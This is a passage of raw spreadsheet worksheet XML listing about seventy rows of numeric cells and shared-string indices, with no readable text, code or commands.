        <v>6550.0</v>
      </c>
      <c r="B33714" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C33714" s="2" t="s">
        <v>32456</v>
      </c>
      <c r="D33714" s="2">
        <v>1.0</v>
      </c>
      <c r="E33714" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33714" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33715" ht="15.75" customHeight="1">
      <c r="A33715" s="1">
        <v>6559.0</v>
      </c>
      <c r="B33715" s="2">
        <v>4.8878972E7</v>
      </c>
      <c r="C33715" s="2" t="s">
        <v>32457</v>
      </c>
      <c r="D33715" s="2">
        <v>1.0</v>
      </c>
      <c r="E33715" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33715" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33716" ht="15.75" customHeight="1">
      <c r="A33716" s="1">
        <v>6560.0</v>
      </c>
      <c r="B33716" s="2">
        <v>4.8885067E7</v>
      </c>
      <c r="C33716" s="2" t="s">
        <v>32290</v>
      </c>
      <c r="D33716" s="2">
        <v>1.0</v>
      </c>
      <c r="E33716" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33716" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33717" ht="15.75" customHeight="1">
      <c r="A33717" s="1">
        <v>6561.0</v>
      </c>
      <c r="B33717" s="2">
        <v>4.8885067E7</v>
      </c>
      <c r="C33717" s="2" t="s">
        <v>32290</v>
      </c>
      <c r="D33717" s="2">
        <v>1.0</v>
      </c>
      <c r="E33717" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33717" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33718" ht="15.75" customHeight="1">
      <c r="A33718" s="1">
        <v>6562.0</v>
      </c>
      <c r="B33718" s="2">
        <v>4.8885067E7</v>
      </c>
      <c r="C33718" s="2" t="s">
        <v>32290</v>
      </c>
      <c r="D33718" s="2">
        <v>1.0</v>
      </c>
      <c r="E33718" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33718" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33719" ht="15.75" customHeight="1">
      <c r="A33719" s="1">
        <v>6563.0</v>
      </c>
      <c r="B33719" s="2">
        <v>4.8885067E7</v>
      </c>
      <c r="C33719" s="2" t="s">
        <v>32290</v>
      </c>
      <c r="D33719" s="2">
        <v>1.0</v>
      </c>
      <c r="E33719" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33719" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33720" ht="15.75" customHeight="1">
      <c r="A33720" s="1">
        <v>6571.0</v>
      </c>
      <c r="B33720" s="2">
        <v>4.8914493E7</v>
      </c>
      <c r="C33720" s="2" t="s">
        <v>32458</v>
      </c>
      <c r="D33720" s="2">
        <v>1.0</v>
      </c>
      <c r="E33720" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33720" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33721" ht="15.75" customHeight="1">
      <c r="A33721" s="1">
        <v>6658.0</v>
      </c>
      <c r="B33721" s="2">
        <v>4.9100057E7</v>
      </c>
      <c r="C33721" s="2" t="s">
        <v>32459</v>
      </c>
      <c r="D33721" s="2">
        <v>1.0</v>
      </c>
      <c r="E33721" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33721" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33722" ht="15.75" customHeight="1">
      <c r="A33722" s="1">
        <v>6662.0</v>
      </c>
      <c r="B33722" s="2">
        <v>4.9111227E7</v>
      </c>
      <c r="C33722" s="2" t="s">
        <v>32460</v>
      </c>
      <c r="D33722" s="2">
        <v>1.0</v>
      </c>
      <c r="E33722" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33722" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33723" ht="15.75" customHeight="1">
      <c r="A33723" s="1">
        <v>6672.0</v>
      </c>
      <c r="B33723" s="2">
        <v>4.9139136E7</v>
      </c>
      <c r="C33723" s="2" t="s">
        <v>32461</v>
      </c>
      <c r="D33723" s="2">
        <v>1.0</v>
      </c>
      <c r="E33723" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33723" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33724" ht="15.75" customHeight="1">
      <c r="A33724" s="1">
        <v>6756.0</v>
      </c>
      <c r="B33724" s="2">
        <v>4.9390396E7</v>
      </c>
      <c r="C33724" s="2" t="s">
        <v>32462</v>
      </c>
      <c r="D33724" s="2">
        <v>1.0</v>
      </c>
      <c r="E33724" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33724" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33725" ht="15.75" customHeight="1">
      <c r="A33725" s="1">
        <v>6773.0</v>
      </c>
      <c r="B33725" s="2">
        <v>4.9435849E7</v>
      </c>
      <c r="C33725" s="2" t="s">
        <v>32463</v>
      </c>
      <c r="D33725" s="2">
        <v>1.0</v>
      </c>
      <c r="E33725" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33725" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33726" ht="15.75" customHeight="1">
      <c r="A33726" s="1">
        <v>6779.0</v>
      </c>
      <c r="B33726" s="2">
        <v>4.9469305E7</v>
      </c>
      <c r="C33726" s="2" t="s">
        <v>32464</v>
      </c>
      <c r="D33726" s="2">
        <v>1.0</v>
      </c>
      <c r="E33726" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33726" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33727" ht="15.75" customHeight="1">
      <c r="A33727" s="1">
        <v>6808.0</v>
      </c>
      <c r="B33727" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C33727" s="2" t="s">
        <v>32465</v>
      </c>
      <c r="D33727" s="2">
        <v>1.0</v>
      </c>
      <c r="E33727" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33727" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33728" ht="15.75" customHeight="1">
      <c r="A33728" s="1">
        <v>6831.0</v>
      </c>
      <c r="B33728" s="2">
        <v>4.9596758E7</v>
      </c>
      <c r="C33728" s="2" t="s">
        <v>32466</v>
      </c>
      <c r="D33728" s="2">
        <v>1.0</v>
      </c>
      <c r="E33728" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33728" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33729" ht="15.75" customHeight="1">
      <c r="A33729" s="1">
        <v>6952.0</v>
      </c>
      <c r="B33729" s="2">
        <v>4.9968101E7</v>
      </c>
      <c r="C33729" s="2" t="s">
        <v>32467</v>
      </c>
      <c r="D33729" s="2">
        <v>1.0</v>
      </c>
      <c r="E33729" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33729" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33730" ht="15.75" customHeight="1">
      <c r="A33730" s="1">
        <v>6955.0</v>
      </c>
      <c r="B33730" s="2">
        <v>4.9973199E7</v>
      </c>
      <c r="C33730" s="2" t="s">
        <v>32468</v>
      </c>
      <c r="D33730" s="2">
        <v>1.0</v>
      </c>
      <c r="E33730" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33730" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33731" ht="15.75" customHeight="1">
      <c r="A33731" s="1">
        <v>7009.0</v>
      </c>
      <c r="B33731" s="2">
        <v>5.0090945E7</v>
      </c>
      <c r="C33731" s="2" t="s">
        <v>32469</v>
      </c>
      <c r="D33731" s="2">
        <v>1.0</v>
      </c>
      <c r="E33731" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33731" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33732" ht="15.75" customHeight="1">
      <c r="A33732" s="1">
        <v>7059.0</v>
      </c>
      <c r="B33732" s="2">
        <v>5.0200467E7</v>
      </c>
      <c r="C33732" s="2" t="s">
        <v>32470</v>
      </c>
      <c r="D33732" s="2">
        <v>1.0</v>
      </c>
      <c r="E33732" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33732" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33733" ht="15.75" customHeight="1">
      <c r="A33733" s="1">
        <v>7136.0</v>
      </c>
      <c r="B33733" s="2">
        <v>5.0440931E7</v>
      </c>
      <c r="C33733" s="2" t="s">
        <v>32471</v>
      </c>
      <c r="D33733" s="2">
        <v>1.0</v>
      </c>
      <c r="E33733" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33733" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33734" ht="15.75" customHeight="1">
      <c r="A33734" s="1">
        <v>7206.0</v>
      </c>
      <c r="B33734" s="2">
        <v>5.0596052E7</v>
      </c>
      <c r="C33734" s="2" t="s">
        <v>32472</v>
      </c>
      <c r="D33734" s="2">
        <v>1.0</v>
      </c>
      <c r="E33734" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33734" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33735" ht="15.75" customHeight="1">
      <c r="A33735" s="1">
        <v>7233.0</v>
      </c>
      <c r="B33735" s="2">
        <v>5.0671202E7</v>
      </c>
      <c r="C33735" s="2" t="s">
        <v>32473</v>
      </c>
      <c r="D33735" s="2">
        <v>1.0</v>
      </c>
      <c r="E33735" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33735" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33736" ht="15.75" customHeight="1">
      <c r="A33736" s="1">
        <v>7253.0</v>
      </c>
      <c r="B33736" s="2">
        <v>5.0729443E7</v>
      </c>
      <c r="C33736" s="2" t="s">
        <v>32474</v>
      </c>
      <c r="D33736" s="2">
        <v>1.0</v>
      </c>
      <c r="E33736" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33736" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33737" ht="15.75" customHeight="1">
      <c r="A33737" s="1">
        <v>7257.0</v>
      </c>
      <c r="B33737" s="2">
        <v>5.0732289E7</v>
      </c>
      <c r="C33737" s="2" t="s">
        <v>32475</v>
      </c>
      <c r="D33737" s="2">
        <v>1.0</v>
      </c>
      <c r="E33737" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33737" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33738" ht="15.75" customHeight="1">
      <c r="A33738" s="1">
        <v>7280.0</v>
      </c>
      <c r="B33738" s="2">
        <v>5.0786364E7</v>
      </c>
      <c r="C33738" s="2" t="s">
        <v>32476</v>
      </c>
      <c r="D33738" s="2">
        <v>1.0</v>
      </c>
      <c r="E33738" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33738" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33739" ht="15.75" customHeight="1">
      <c r="A33739" s="1">
        <v>7294.0</v>
      </c>
      <c r="B33739" s="2">
        <v>5.08266E7</v>
      </c>
      <c r="C33739" s="2" t="s">
        <v>32477</v>
      </c>
      <c r="D33739" s="2">
        <v>1.0</v>
      </c>
      <c r="E33739" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33739" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33740" ht="15.75" customHeight="1">
      <c r="A33740" s="1">
        <v>7304.0</v>
      </c>
      <c r="B33740" s="2">
        <v>5.0848195E7</v>
      </c>
      <c r="C33740" s="2" t="s">
        <v>32478</v>
      </c>
      <c r="D33740" s="2">
        <v>1.0</v>
      </c>
      <c r="E33740" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33740" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33741" ht="15.75" customHeight="1">
      <c r="A33741" s="1">
        <v>7385.0</v>
      </c>
      <c r="B33741" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C33741" s="2" t="s">
        <v>32479</v>
      </c>
      <c r="D33741" s="2">
        <v>1.0</v>
      </c>
      <c r="E33741" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33741" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33742" ht="15.75" customHeight="1">
      <c r="A33742" s="1">
        <v>7391.0</v>
      </c>
      <c r="B33742" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C33742" s="2" t="s">
        <v>32480</v>
      </c>
      <c r="D33742" s="2">
        <v>1.0</v>
      </c>
      <c r="E33742" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33742" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33743" ht="15.75" customHeight="1">
      <c r="A33743" s="1">
        <v>7409.0</v>
      </c>
      <c r="B33743" s="2">
        <v>5.112461E7</v>
      </c>
      <c r="C33743" s="2" t="s">
        <v>32481</v>
      </c>
      <c r="D33743" s="2">
        <v>1.0</v>
      </c>
      <c r="E33743" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33743" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33744" ht="15.75" customHeight="1">
      <c r="A33744" s="1">
        <v>7428.0</v>
      </c>
      <c r="B33744" s="2">
        <v>5.1161837E7</v>
      </c>
      <c r="C33744" s="2" t="s">
        <v>32482</v>
      </c>
      <c r="D33744" s="2">
        <v>1.0</v>
      </c>
      <c r="E33744" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33744" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33745" ht="15.75" customHeight="1">
      <c r="A33745" s="1">
        <v>7462.0</v>
      </c>
      <c r="B33745" s="2">
        <v>5.1257802E7</v>
      </c>
      <c r="C33745" s="2" t="s">
        <v>32483</v>
      </c>
      <c r="D33745" s="2">
        <v>1.0</v>
      </c>
      <c r="E33745" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33745" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33746" ht="15.75" customHeight="1">
      <c r="A33746" s="1">
        <v>7470.0</v>
      </c>
      <c r="B33746" s="2">
        <v>5.1280541E7</v>
      </c>
      <c r="C33746" s="2" t="s">
        <v>32484</v>
      </c>
      <c r="D33746" s="2">
        <v>1.0</v>
      </c>
      <c r="E33746" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33746" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33747" ht="15.75" customHeight="1">
      <c r="A33747" s="1">
        <v>7477.0</v>
      </c>
      <c r="B33747" s="2">
        <v>5.1333835E7</v>
      </c>
      <c r="C33747" s="2" t="s">
        <v>32485</v>
      </c>
      <c r="D33747" s="2">
        <v>1.0</v>
      </c>
      <c r="E33747" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33747" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33748" ht="15.75" customHeight="1">
      <c r="A33748" s="1">
        <v>7504.0</v>
      </c>
      <c r="B33748" s="2">
        <v>5.1393826E7</v>
      </c>
      <c r="C33748" s="2" t="s">
        <v>32486</v>
      </c>
      <c r="D33748" s="2">
        <v>1.0</v>
      </c>
      <c r="E33748" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33748" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33749" ht="15.75" customHeight="1">
      <c r="A33749" s="1">
        <v>7617.0</v>
      </c>
      <c r="B33749" s="2">
        <v>5.1711853E7</v>
      </c>
      <c r="C33749" s="2" t="s">
        <v>32487</v>
      </c>
      <c r="D33749" s="2">
        <v>1.0</v>
      </c>
      <c r="E33749" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33749" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33750" ht="15.75" customHeight="1">
      <c r="A33750" s="1">
        <v>7627.0</v>
      </c>
      <c r="B33750" s="2">
        <v>5.174677E7</v>
      </c>
      <c r="C33750" s="2" t="s">
        <v>32488</v>
      </c>
      <c r="D33750" s="2">
        <v>1.0</v>
      </c>
      <c r="E33750" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33750" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33751" ht="15.75" customHeight="1">
      <c r="A33751" s="1">
        <v>7644.0</v>
      </c>
      <c r="B33751" s="2">
        <v>5.177896E7</v>
      </c>
      <c r="C33751" s="2" t="s">
        <v>32489</v>
      </c>
      <c r="D33751" s="2">
        <v>1.0</v>
      </c>
      <c r="E33751" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33751" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33752" ht="15.75" customHeight="1">
      <c r="A33752" s="1">
        <v>7645.0</v>
      </c>
      <c r="B33752" s="2">
        <v>5.1779523E7</v>
      </c>
      <c r="C33752" s="2" t="s">
        <v>32490</v>
      </c>
      <c r="D33752" s="2">
        <v>1.0</v>
      </c>
      <c r="E33752" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33752" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33753" ht="15.75" customHeight="1">
      <c r="A33753" s="1">
        <v>7680.0</v>
      </c>
      <c r="B33753" s="2">
        <v>5.191851E7</v>
      </c>
      <c r="C33753" s="2" t="s">
        <v>32491</v>
      </c>
      <c r="D33753" s="2">
        <v>1.0</v>
      </c>
      <c r="E33753" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33753" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33754" ht="15.75" customHeight="1">
      <c r="A33754" s="1">
        <v>7694.0</v>
      </c>
      <c r="B33754" s="2">
        <v>5.1956929E7</v>
      </c>
      <c r="C33754" s="2" t="s">
        <v>32492</v>
      </c>
      <c r="D33754" s="2">
        <v>1.0</v>
      </c>
      <c r="E33754" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33754" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33755" ht="15.75" customHeight="1">
      <c r="A33755" s="1">
        <v>7712.0</v>
      </c>
      <c r="B33755" s="2">
        <v>5.2019031E7</v>
      </c>
      <c r="C33755" s="2" t="s">
        <v>32493</v>
      </c>
      <c r="D33755" s="2">
        <v>1.0</v>
      </c>
      <c r="E33755" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33755" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33756" ht="15.75" customHeight="1">
      <c r="A33756" s="1">
        <v>7716.0</v>
      </c>
      <c r="B33756" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C33756" s="2" t="s">
        <v>32494</v>
      </c>
      <c r="D33756" s="2">
        <v>1.0</v>
      </c>
      <c r="E33756" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33756" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33757" ht="15.75" customHeight="1">
      <c r="A33757" s="1">
        <v>7717.0</v>
      </c>
      <c r="B33757" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C33757" s="2" t="s">
        <v>32495</v>
      </c>
      <c r="D33757" s="2">
        <v>1.0</v>
      </c>
      <c r="E33757" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33757" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33758" ht="15.75" customHeight="1">
      <c r="A33758" s="1">
        <v>7718.0</v>
      </c>
      <c r="B33758" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C33758" s="2" t="s">
        <v>32496</v>
      </c>
      <c r="D33758" s="2">
        <v>1.0</v>
      </c>
      <c r="E33758" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33758" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33759" ht="15.75" customHeight="1">
      <c r="A33759" s="1">
        <v>7720.0</v>
      </c>
      <c r="B33759" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C33759" s="2" t="s">
        <v>32494</v>
      </c>
      <c r="D33759" s="2">
        <v>1.0</v>
      </c>
      <c r="E33759" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33759" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33760" ht="15.75" customHeight="1">
      <c r="A33760" s="1">
        <v>7726.0</v>
      </c>
      <c r="B33760" s="2">
        <v>5.2021402E7</v>
      </c>
      <c r="C33760" s="2" t="s">
        <v>32497</v>
      </c>
      <c r="D33760" s="2">
        <v>1.0</v>
      </c>
      <c r="E33760" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33760" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33761" ht="15.75" customHeight="1">
      <c r="A33761" s="1">
        <v>7736.0</v>
      </c>
      <c r="B33761" s="2">
        <v>5.2047573E7</v>
      </c>
      <c r="C33761" s="2" t="s">
        <v>32498</v>
      </c>
      <c r="D33761" s="2">
        <v>1.0</v>
      </c>
      <c r="E33761" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33761" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33762" ht="15.75" customHeight="1">
      <c r="A33762" s="1">
        <v>7761.0</v>
      </c>
      <c r="B33762" s="2">
        <v>5.2106134E7</v>
      </c>
      <c r="C33762" s="2" t="s">
        <v>32499</v>
      </c>
      <c r="D33762" s="2">
        <v>1.0</v>
      </c>
      <c r="E33762" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33762" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33763" ht="15.75" customHeight="1">
      <c r="A33763" s="1">
        <v>7859.0</v>
      </c>
      <c r="B33763" s="2">
        <v>5.2374124E7</v>
      </c>
      <c r="C33763" s="2" t="s">
        <v>32500</v>
      </c>
      <c r="D33763" s="2">
        <v>1.0</v>
      </c>
      <c r="E33763" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33763" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33764" ht="15.75" customHeight="1">
      <c r="A33764" s="1">
        <v>7905.0</v>
      </c>
      <c r="B33764" s="2">
        <v>5.2484636E7</v>
      </c>
      <c r="C33764" s="2" t="s">
        <v>32501</v>
      </c>
      <c r="D33764" s="2">
        <v>1.0</v>
      </c>
      <c r="E33764" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33764" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33765" ht="15.75" customHeight="1">
      <c r="A33765" s="1">
        <v>7958.0</v>
      </c>
      <c r="B33765" s="2">
        <v>5.2655969E7</v>
      </c>
      <c r="C33765" s="2" t="s">
        <v>32502</v>
      </c>
      <c r="D33765" s="2">
        <v>1.0</v>
      </c>
      <c r="E33765" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33765" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33766" ht="15.75" customHeight="1">
      <c r="A33766" s="1">
        <v>7983.0</v>
      </c>
      <c r="B33766" s="2">
        <v>5.2740945E7</v>
      </c>
      <c r="C33766" s="2" t="s">
        <v>32503</v>
      </c>
      <c r="D33766" s="2">
        <v>1.0</v>
      </c>
      <c r="E33766" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33766" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33767" ht="15.75" customHeight="1">
      <c r="A33767" s="1">
        <v>7989.0</v>
      </c>
      <c r="B33767" s="2">
        <v>5.2751103E7</v>
      </c>
      <c r="C33767" s="2" t="s">
        <v>32504</v>
      </c>
      <c r="D33767" s="2">
        <v>1.0</v>
      </c>
      <c r="E33767" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33767" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33768" ht="15.75" customHeight="1">
      <c r="A33768" s="1">
        <v>8095.0</v>
      </c>
      <c r="B33768" s="2">
        <v>5.3059581E7</v>
      </c>
      <c r="C33768" s="2" t="s">
        <v>32505</v>
      </c>
      <c r="D33768" s="2">
        <v>1.0</v>
      </c>
      <c r="E33768" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33768" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33769" ht="15.75" customHeight="1">
      <c r="A33769" s="1">
        <v>8148.0</v>
      </c>
      <c r="B33769" s="2">
        <v>5.3166978E7</v>
      </c>
      <c r="C33769" s="2" t="s">
        <v>32506</v>
      </c>
      <c r="D33769" s="2">
        <v>1.0</v>
      </c>
      <c r="E33769" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33769" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33770" ht="15.75" customHeight="1">
      <c r="A33770" s="1">
        <v>8213.0</v>
      </c>
      <c r="B33770" s="2">
        <v>5.3310222E7</v>
      </c>
      <c r="C33770" s="2" t="s">
        <v>32507</v>
      </c>
      <c r="D33770" s="2">
        <v>1.0</v>
      </c>
      <c r="E33770" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33770" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33771" ht="15.75" customHeight="1">
      <c r="A33771" s="1">
        <v>8233.0</v>
      </c>
      <c r="B33771" s="2">
        <v>5.3355096E7</v>
      </c>
      <c r="C33771" s="2" t="s">
        <v>32508</v>
      </c>
      <c r="D33771" s="2">
        <v>1.0</v>
      </c>
      <c r="E33771" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33771" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33772" ht="15.75" customHeight="1">
      <c r="A33772" s="1">
        <v>8265.0</v>
      </c>
      <c r="B33772" s="2">
        <v>5.3427902E7</v>
      </c>
      <c r="C33772" s="2" t="s">
        <v>32509</v>
      </c>
      <c r="D33772" s="2">
        <v>1.0</v>
      </c>
      <c r="E33772" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33772" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33773" ht="15.75" customHeight="1">
      <c r="A33773" s="1">
        <v>8289.0</v>
      </c>
      <c r="B33773" s="2">
        <v>5.352239E7</v>
      </c>
      <c r="C33773" s="2" t="s">
        <v>32510</v>
      </c>
      <c r="D33773" s="2">
        <v>1.0</v>
      </c>
      <c r="E33773" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33773" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33774" ht="15.75" customHeight="1">
      <c r="A33774" s="1">
        <v>8329.0</v>
      </c>
      <c r="B33774" s="2">
        <v>5.3652583E7</v>
      </c>
      <c r="C33774" s="2" t="s">
        <v>32511</v>
      </c>
      <c r="D33774" s="2">
        <v>1.0</v>
      </c>
      <c r="E33774" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33774" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33775" ht="15.75" customHeight="1">
      <c r="A33775" s="1">
        <v>8371.0</v>
      </c>
      <c r="B33775" s="2">
        <v>5.380248E7</v>
      </c>
      <c r="C33775" s="2" t="s">
        <v>32512</v>
      </c>
      <c r="D33775" s="2">
        <v>1.0</v>
      </c>
      <c r="E33775" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33775" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33776" ht="15.75" customHeight="1">
      <c r="A33776" s="1">
        <v>8377.0</v>
      </c>
      <c r="B33776" s="2">
        <v>5.3812002E7</v>
      </c>
      <c r="C33776" s="2" t="s">
        <v>32513</v>
      </c>
      <c r="D33776" s="2">
        <v>1.0</v>
      </c>
      <c r="E33776" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33776" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33777" ht="15.75" customHeight="1">
      <c r="A33777" s="1">
        <v>8421.0</v>
      </c>
      <c r="B33777" s="2">
        <v>5.3926649E7</v>
      </c>
      <c r="C33777" s="2" t="s">
        <v>32514</v>
      </c>
      <c r="D33777" s="2">
        <v>1.0</v>
      </c>
      <c r="E33777" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33777" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33778" ht="15.75" customHeight="1">
      <c r="A33778" s="1">
        <v>8424.0</v>
      </c>
      <c r="B33778" s="2">
        <v>5.392953E7</v>
      </c>
      <c r="C33778" s="2" t="s">
        <v>32515</v>
      </c>
      <c r="D33778" s="2">
        <v>1.0</v>
      </c>
      <c r="E33778" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33778" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33779" ht="15.75" customHeight="1">
      <c r="A33779" s="1">
        <v>8518.0</v>
      </c>
      <c r="B33779" s="2">
        <v>5.4080214E7</v>
      </c>
      <c r="C33779" s="2" t="s">
        <v>32516</v>
      </c>
      <c r="D33779" s="2">
        <v>1.0</v>
      </c>
      <c r="E33779" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33779" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33780" ht="15.75" customHeight="1">
      <c r="A33780" s="1">
        <v>8619.0</v>
      </c>
      <c r="B33780" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C33780" s="2" t="s">
        <v>32517</v>
      </c>
      <c r="D33780" s="2">
        <v>1.0</v>
      </c>
      <c r="E33780" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33780" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="33781" ht="15.75" customHeight="1">
      <c r="A33781" s="1">
